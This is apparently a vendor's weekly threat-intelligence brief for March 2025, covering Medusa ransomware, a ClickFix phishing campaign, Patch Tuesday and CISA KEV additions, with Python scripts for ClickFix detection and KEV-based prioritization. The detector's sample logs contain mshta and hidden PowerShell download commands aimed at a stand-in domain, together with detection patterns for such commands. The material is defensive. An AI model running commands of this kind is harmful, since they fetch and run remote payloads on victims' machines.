Threat Intel Brief for March 10 - 16, 2025

In this weekly Threat Intelligence Brief we look back at the top stories and security-related callouts of the week to provide relevant and actionable insights for the information security consumer.

We reference threat intelligence gained through our position as a security provider as well as industry sources in the development of this brief.

In this edition:
Medusa Ransomware Advisory
Social Engineering with ClickFix
Microsoft March 2025 Patch Tuesday
CISA KEV Updates

Medusa Ransomware Advisory

A joint advisory for Medusa ransomware was issued by the FBI, CISA and MS-ISAC to highlight historically observed TTPs and IOCs from the ransomware-as-a-service provider. More than 300 known victims have been impacted so far, spanning a variety of critical sectors including medical, education, legal, insurance, technology and manufacturing.

Medusa developers are known to recruit initial access brokers who focus primarily on phishing and exploitation of unpatched software vulnerabilities. The group leverages double extortion techniques, combining data encryption with the threat of leaking sensitive information to compel payment. Medusa ransomware incidents highlight the escalating trend of threat actors targeting critical services, which intensifies pressure on victims to pay ransoms in order to limit operational disruptions and accelerate recovery. CISA recommends the following actions to help mitigate threats related to Medusa ransomware activity:

Please see the linked source material for a full list of IOCs and mitigation strategies.

Source: CISA

Social Engineering with ClickFix

Microsoft Threat Intelligence has identified an ongoing phishing campaign impersonating the online travel platform Booking.com, with a specific focus on entities within the hospitality sector. The attackers employ a social engineering method known as "ClickFix" to distribute multiple credential-harvesting malware strains, aiming to facilitate financial fraud and data theft.

The ClickFix technique exploits users' natural inclination to resolve problems by presenting deceptive error messages or prompts. These prompts instruct the user to copy, paste, and execute commands, which ultimately leads to malware delivery. In this phishing campaign, victims are guided to open the Windows Run dialog using a keyboard shortcut, then unknowingly execute a malicious command that the phishing site has automatically placed on their clipboard. Here is an example of a fake CAPTCHA using the ClickFix social engineering technique:
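Because a ClickFix command is pasted into the Run dialog, the resulting process is a child of explorer.exe and the command text is written to the Run dialog's RunMRU registry key, which gives defenders two telemetry points to watch. The script below is an added example (not from Microsoft or the original brief) that applies those two checks to Sysmon-style process-creation (Event ID 1) and registry value-set (Event ID 13) records; the log lines, host names, user names and the captcha-check.example.invalid domain are all constructed for the example, and the key=value line format is an assumption rather than any particular product's export format.

```python
import re

# Script hosts and download utilities that a pasted ClickFix command typically invokes.
SCRIPT_HOSTS = {
    "powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
    "wscript.exe", "cscript.exe", "curl.exe", "certutil.exe",
}

# Command-line fragments that make a shell-launched script host suspicious (matched case-insensitively).
SUSPICIOUS_ARGS = [
    (r"https?://", "remote URL in command line"),
    (r"-w(?:indowstyle)?\s+hidden", "hidden window requested"),
    (r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", "encoded command"),
    (r"\biex\b|invoke-expression", "Invoke-Expression"),
    (r"downloadstring|invoke-webrequest|\birm\b|\biwr\b", "download cmdlet"),
    (r"\.hta\b", "HTA payload"),
]

# The Run dialog records every executed command under this per-user key (values end in "\1").
RUNMRU = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\", re.I)

# key=value pairs; values containing spaces are double-quoted.
KV = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

# Constructed sample telemetry: three ClickFix-style records followed by three benign ones.
SAMPLE_EVENTS = [
    r'EventID=1 Image=C:\Windows\System32\mshta.exe ParentImage=C:\Windows\explorer.exe CommandLine="mshta.exe https://captcha-check.example.invalid/verify.hta" User=CORP\jdoe',
    r'EventID=13 TargetObject="HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a" Details="mshta.exe https://captcha-check.example.invalid/verify.hta\1" User=CORP\jdoe',
    r'EventID=1 Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentImage=C:\Windows\explorer.exe CommandLine="powershell.exe -w hidden -c Invoke-WebRequest https://captcha-check.example.invalid/step2" User=CORP\asmith',
    r'EventID=1 Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentImage="C:\Program Files\Microsoft VS Code\Code.exe" CommandLine="powershell.exe -NoProfile -File build.ps1" User=CORP\asmith',
    r'EventID=1 Image=C:\Windows\System32\notepad.exe ParentImage=C:\Windows\explorer.exe CommandLine="notepad.exe C:\Users\jdoe\notes.txt" User=CORP\jdoe',
    r'EventID=13 TargetObject="HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\b" Details="notepad\1" User=CORP\jdoe',
]


def parse_event(line):
    """Parse one key=value log line into a dict (quoted or unquoted values)."""
    return {key: (quoted or bare) for key, quoted, bare in KV.findall(line)}


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def suspicious_fragments(command_line):
    """Names of the SUSPICIOUS_ARGS patterns present in a command line."""
    return [why for pattern, why in SUSPICIOUS_ARGS if re.search(pattern, command_line, re.I)]


def assess(event):
    """Return the reasons an event looks like ClickFix execution; an empty list means benign."""
    reasons = []
    if event.get("EventID") == "1":
        image = basename(event.get("Image", ""))
        parent = basename(event.get("ParentImage", ""))
        # Run-dialog launches are children of explorer.exe; IDE- or script-spawned hosts are not.
        if parent == "explorer.exe" and image in SCRIPT_HOSTS:
            hits = suspicious_fragments(event.get("CommandLine", ""))
            if hits:
                reasons.append(f"{image} launched from explorer.exe with: " + ", ".join(hits))
    elif event.get("EventID") == "13":
        details = event.get("Details", "")
        if RUNMRU.search(event.get("TargetObject", "")):
            command = details[:-2] if details.endswith("\\1") else details
            first = basename(command.split(" ", 1)[0])
            if not first.endswith(".exe"):
                first += ".exe"  # users often type "mshta" or "powershell" without the extension
            hits = suspicious_fragments(command)
            if first in SCRIPT_HOSTS and hits:
                reasons.append(f"RunMRU entry for {first} with: " + ", ".join(hits))
    return reasons


def scan(lines):
    """Return (line number, user, reasons) for every record that assess() flags."""
    findings = []
    for number, line in enumerate(lines, 1):
        event = parse_event(line)
        reasons = assess(event)
        if reasons:
            findings.append((number, event.get("User", "?"), reasons))
    return findings


if __name__ == "__main__":
    for number, user, reasons in scan(SAMPLE_EVENTS):
        print(f"record {number} user={user}: " + "; ".join(reasons))
```

Requiring both the explorer.exe parent (or the RunMRU write) and a suspicious argument keeps ordinary Run-dialog use such as opening Notepad out of the alert queue; in a SIEM the same two conditions translate directly into a correlation rule, and the RunMRU write is worth keeping as an independent signal because it survives even when the spawned process exits quickly.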

Some general recommendations from Microsoft to help spot phishing attempts include:

 - Check the sender’s email address to ensure it’s legitimate
 - Contact the service provider directly
 - Be wary of urgent calls to action or threats
 - Hover over links to observe the full URL
 - Search for typos

Source: Microsoft Threat Intelligence 

Microsoft March 2025 Patch Tuesday

Microsoft fixed 57 vulnerabilities in total, 6 of them rated critical severity. Products affected include Microsoft Streaming Service, Windows Hyper-V, Microsoft Windows, DNS Server, Visual Studio, Windows Routing and Remote Access Service (RRAS), Windows NTLM, Windows Common Log File System Driver, and more.

7 actively exploited zero-day vulnerabilities were patched, including:

CVE-2025-24983, CVE-2025-24984, CVE-2025-24985, CVE-2025-24991, CVE-2025-24993, CVE-2025-26630 and CVE-2025-26633

Official Microsoft release notes with links to all the individual CVEs can be found here: https://msrc.microsoft.com/update-guide/releaseNote/2025-Mar

Source: Microsoft

CISA KEV Updates

CISA has added 13 new CVEs to its Known Exploited Vulnerabilities (KEV) catalog this week:

Don't know where to begin with vulnerability management?

Using CISA's KEV catalog as a risk-based approach can be a great way to help prioritize vulnerability remediation in your organization. This link provides guidance on how to put CISA's KEV catalog to use.
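In practice, prioritizing with the KEV catalog means joining your scanner's open findings against the catalog's JSON feed and ordering remediation by whether a CVE is in KEV at all, whether CISA's remediation due date has passed, and whether CISA marks it as used in ransomware campaigns. The script below is an added example (not CISA's tooling and not part of the original brief): it embeds a constructed three-entry excerpt in the shape of the real KEV JSON feed (the cveID, dateAdded, dueDate and knownRansomwareCampaignUse fields are real field names; the CVE numbers, vendor, product, dates and host inventory are placeholders made up for the example) and produces a ranked remediation list.

```python
import json
from datetime import date

# Constructed excerpt in the layout of the CISA KEV JSON feed. The CVE IDs below are placeholders,
# not real catalog entries; a real run would load the full feed downloaded from cisa.gov.
KEV_JSON = """{
  "title": "CISA Catalog of Known Exploited Vulnerabilities",
  "catalogVersion": "CONSTRUCTED-SAMPLE",
  "vulnerabilities": [
    {"cveID": "CVE-2025-00001", "vendorProject": "ExampleVendor", "product": "Example Gateway",
     "vulnerabilityName": "Example Gateway Authentication Bypass", "dateAdded": "2025-03-11",
     "shortDescription": "Placeholder description.", "requiredAction": "Apply vendor mitigations.",
     "dueDate": "2025-04-01", "knownRansomwareCampaignUse": "Known"},
    {"cveID": "CVE-2025-00002", "vendorProject": "ExampleVendor", "product": "Example File Server",
     "vulnerabilityName": "Example File Server Privilege Escalation", "dateAdded": "2025-02-27",
     "shortDescription": "Placeholder description.", "requiredAction": "Apply vendor mitigations.",
     "dueDate": "2025-03-20", "knownRansomwareCampaignUse": "Unknown"},
    {"cveID": "CVE-2024-00003", "vendorProject": "ExampleVendor", "product": "Example VPN",
     "vulnerabilityName": "Example VPN Remote Code Execution", "dateAdded": "2024-11-10",
     "shortDescription": "Placeholder description.", "requiredAction": "Apply vendor mitigations.",
     "dueDate": "2024-12-01", "knownRansomwareCampaignUse": "Unknown"}
  ]
}"""

# Constructed scanner output: host name -> open CVEs. CVE-2025-00099 stands in for a finding not in KEV.
INVENTORY = {
    "web-01": ["CVE-2025-00001", "CVE-2025-00099"],
    "vpn-gw": ["CVE-2024-00003"],
    "file-srv": ["CVE-2025-00002", "CVE-2025-00099"],
    "dev-box": ["CVE-2025-00099"],
}

# Lower number = remediate first.
TIER_ORDER = {"overdue": 0, "ransomware": 1, "kev": 2, "routine": 3}


def load_kev(text):
    """Index the KEV feed by CVE ID so inventory lookups are O(1)."""
    return {entry["cveID"]: entry for entry in json.loads(text)["vulnerabilities"]}


def classify(record, today):
    """Assign a KEV record to a remediation tier and compute days until CISA's due date."""
    days_left = (date.fromisoformat(record["dueDate"]) - today).days
    if days_left < 0:
        return "overdue", days_left
    if record.get("knownRansomwareCampaignUse") == "Known":
        return "ransomware", days_left
    return "kev", days_left


def prioritize(inventory, kev, today):
    """Join scanner findings against KEV and return them most urgent first."""
    rows = []
    for host, cves in inventory.items():
        for cve in cves:
            record = kev.get(cve)
            if record is None:
                rows.append({"host": host, "cve": cve, "tier": "routine", "days_left": None})
                continue
            tier, days_left = classify(record, today)
            rows.append({"host": host, "cve": cve, "tier": tier, "days_left": days_left,
                         "product": record["product"], "due": record["dueDate"]})
    # Sort by tier, then by nearest due date, then by host name for a stable report.
    rows.sort(key=lambda r: (TIER_ORDER[r["tier"]],
                             r["days_left"] if r["days_left"] is not None else 10**6,
                             r["host"]))
    return rows


def kev_exposure(rows):
    """Count affected hosts per KEV-listed CVE, the figure usually asked for in a status report."""
    counts = {}
    for row in rows:
        if row["tier"] != "routine":
            counts[row["cve"]] = counts.get(row["cve"], 0) + 1
    return counts


if __name__ == "__main__":
    ranked = prioritize(INVENTORY, load_kev(KEV_JSON), date.today())
    for row in ranked:
        due = f"due {row['due']} ({row['days_left']} days)" if row["days_left"] is not None else "not in KEV"
        print(f"{row['tier']:<10} {row['host']:<9} {row['cve']:<15} {due}")
```

The tier order is a policy choice rather than anything CISA prescribes: overdue KEV entries go first because the federal deadline has already lapsed, ransomware-linked entries next because of the kind of impact described in the Medusa advisory above, and remaining KEV entries before everything the scanner found that nobody is known to be exploiting. Swap the order or fold in asset criticality from your CMDB as suits your environment.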

Source: Known Exploited Vulnerabilities Catalog | CISA

Coretek's managed SOC/SIEM customers benefit from the latest threat intelligence. If you're interested in learning more about what Coretek can offer your organization, please reach out: https://coretek.com/contact